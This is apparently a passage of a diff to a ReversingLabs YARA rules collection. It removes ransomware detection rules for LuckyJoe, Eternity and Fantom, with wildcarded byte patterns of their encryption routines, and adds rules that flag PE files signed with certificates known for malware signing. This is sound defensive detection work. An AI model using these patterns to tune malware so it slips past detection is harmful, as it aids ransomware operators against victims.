?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 48 - 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B - 3D ?? ?? ?? ?? 48 89 C3 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 - 89 08 48 8D BC 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 48 A5 48 8D BC - 24 ?? ?? ?? ?? 48 8D 7F ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? - 48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - EB ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8D 84 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 48 85 C9 0F 84 ?? ?? ?? - ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 12 48 89 54 24 ?? 48 8B 01 48 89 44 24 ?? 48 8B 59 - ?? 48 89 5C 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 31 F6 EB ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 - } - $kill_procs_p2 = { - C2 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 89 CE 48 89 D1 48 89 74 24 ?? 48 89 8C 24 ?? - ?? ?? ?? 48 8B 11 48 89 54 24 ?? 48 8B 79 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C - 24 ?? 48 8B 7C 24 ?? 90 E8 ?? ?? ?? ?? 48 85 C0 0F 8C ?? ?? ?? ?? 48 8B 44 24 ?? BB - ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F - 11 3A 48 8D 15 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? - ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? - ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? - 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ?? - ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 48 8B 44 24 ?? 90 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ?? - ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? E8 - } - condition: - uint16(0)==0x5A4D and ( all of ($kill_procs_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "United Systems Technology, Inc." and (pe.signatures[i].serial=="00:d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" or pe.signatures[i].serial=="d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b") and 1341273600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Ransomware_Luckyjoe : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE { meta: - description = "Yara rule that detects LuckyJoe ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8dc98d71-b79d-5b09-9383-11f2b57baeb5" - date = "2020-07-15" - modified = "2020-07-15" + id = "befb8867-37d6-5b0a-9801-c069b92f8edc" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Linux.Ransomware.LuckyJoe.yara#L1-L146" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1e7df2c45bee072af233cf8f355a84ec931fe96afa3fbdcd225dded1b75ea961" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15134-L15150" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bc097e97c1c4c4a71cbf66be811636fecfa23682cb2cc47ab1fcd680a646fb14" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "LuckyJoe" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $main_call_p1 = { - 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 - C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? - 48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 75 ?? 48 - 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? BE ?? ?? - ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8 - ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? - ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? E8 ?? ?? - ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 35 ?? ?? ?? ?? 48 83 EC ?? 48 8B 45 - ?? 6A ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7 - E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ?? - ?? ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? - ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 - } - $main_call_p2 = { - 89 C7 E8 ?? ?? ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? - ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 - ?? 89 C2 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C2 - 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 45 ?? 48 - 01 D0 C6 00 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 D0 C6 00 ?? 48 8B 45 ?? 48 8B 55 ?? 48 - 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? BF ?? ?? ?? ?? E8 ?? - ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? B8 - ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? - 48 83 7D ?? ?? 74 ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 - } - $main_call_p3 = { - E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? - ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ?? - ?? ?? 48 C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 - ?? 48 83 7D ?? ?? 74 ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? - ?? ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B 45 ?? 48 89 - C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? - ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? - ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 48 98 48 8B 84 - C5 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 98 - 48 8B 84 C5 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 74 ?? BF ?? - ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 - ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C9 C3 - } - $encrypt_files_p1 = { - 55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? - ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 D6 F3 48 A5 48 89 F2 48 89 F8 0F B7 0A 66 89 - 08 48 8D 40 ?? 48 8D 52 ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 48 C7 45 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 - F3 48 AB 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 - ?? 48 8B 85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 - E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? - 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 - 01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? - ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? - ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8B 45 - ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48 - 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? - ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 45 ?? 48 - } - $encrypt_files_p2 = { - 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? - ?? EB ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 - 89 45 ?? 48 83 7D ?? ?? 75 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 - 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ?? ?? - 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ?? - ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 - ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 89 C7 E8 ?? - ?? ?? ?? 48 01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ?? - ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B - 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB - ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 - C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F - 85 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3 - } - $encrypt_internal_message_p1 = { - 55 48 89 E5 53 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? BF ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8B - 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 83 C0 ?? 48 98 48 89 C7 E8 ?? ?? ?? - ?? 48 89 45 ?? 8B 45 ?? 83 C0 ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? - ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? - 8B 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 8B 45 ?? 83 E8 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 66 0F EF C0 F2 0F 2A 45 ?? - 66 0F EF C9 F2 0F 2A 4D ?? F2 0F 5E C1 E8 ?? ?? ?? ?? F2 0F 2C C0 89 45 ?? 8B 45 ?? - 0F AF 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 8B 45 ?? 0F AF 45 ?? 48 63 D0 - 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 0F AF 45 ?? 89 C3 48 8B - 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 8B 45 ?? 89 C1 89 DA BF ?? ?? ?? ?? B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 3B 45 ?? 7D ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 45 - ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 89 - } - $encrypt_internal_message_p2 = { - C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 45 ?? 48 8D - 34 02 48 8B 4D ?? 48 8B 55 ?? 8B 45 ?? 41 B8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 89 45 - ?? 8B 45 ?? 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48 - 8B 05 ?? ?? ?? ?? 48 8B 55 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? - 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? - ?? ?? 8B 45 ?? 48 63 D0 8B 45 ?? 48 63 C8 48 8B 45 ?? 48 01 C1 48 8B 45 ?? 48 89 C6 - 48 89 CF E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 8B 45 ?? 01 45 ?? 48 8B 45 ?? 48 89 - C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 0F 8E ?? ?? ?? ?? 48 8B 45 ?? 48 89 - C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 4D ?? 48 8B 45 ?? BA ?? ?? - ?? ?? 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? - 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C4 ?? 5B 5D - C3 - } - condition: - uint32(0)==0x464C457F and ( all of ($main_call_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($encrypt_internal_message_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RDCTO Ltd" and pe.signatures[i].serial=="20:27:02" and 1087391361<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Eternity : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE { meta: - description = "Yara rule that detects Eternity ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7bb0f3b0-a8c0-5239-a1b4-532d403f59bc" - date = "2022-07-22" - modified = "2022-07-22" + id = "2b81466f-3eb1-5c12-8878-9257dde968fb" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Eternity.yara#L1-L74" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a2298a26e9bbe2b779eb2afeeda28d4321bc2d26db46bbb377bf86abaf8fa929" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15152-L15168" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e2a2e231914f166410580a42ca9d4aac18c5cba94d1f11d22e7acd6d375851d8" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Eternity" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? - ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 0C 2B ?? 08 - 6F ?? ?? ?? ?? 0D 09 03 04 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F - ?? ?? ?? ?? DC 02 28 ?? ?? ?? ?? 0B 07 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 - ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? - 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 - ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? - 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 03 04 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 - 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A - } - $encrypt_files = { - 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0A 02 - 28 ?? ?? ?? ?? 0B 07 06 28 ?? ?? ?? ?? 0C 02 19 28 ?? ?? ?? ?? 0D 09 16 6A 6F ?? ?? ?? - ?? 09 6F ?? ?? ?? ?? 02 1C 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? - ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? - 08 16 08 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F - ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 2A - } - $aes_encrypt = { - 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? - ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? - ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? - ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? - ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 - ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? - 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A - } - $encrypt_pass = { - 72 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 0B D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C - 08 07 6F ?? ?? ?? ?? A5 ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 09 6F ?? ?? ?? ?? 7E - ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? - 16 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($aes_encrypt) and ($encrypt_pass) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="36:9a:02:e5:d9:0b:26:49:04:0e:7f:87" and 1479094204<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Fantom : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE { meta: - description = "Yara rule that detects Fantom ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cd32de8b-2c14-5fb4-be79-365d9848f341" - date = "2021-08-12" - modified = "2021-08-12" + id = "510ab702-103b-5863-ac9a-46a917879e72" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Fantom.yara#L1-L97" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f2aaa9776b7ca302052b3303d45df24cc151a4efc7ea9f4bb3c1f53d10ded03a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15170-L15186" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "30998e3f5299a37cdee83b1232249b84dbb3c154ef99237da5ce1b16f9db5da3" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Fantom" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_1 = { - 00 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? - 26 DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 28 - ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? [1-2] 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 [1-2] 20 - ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? 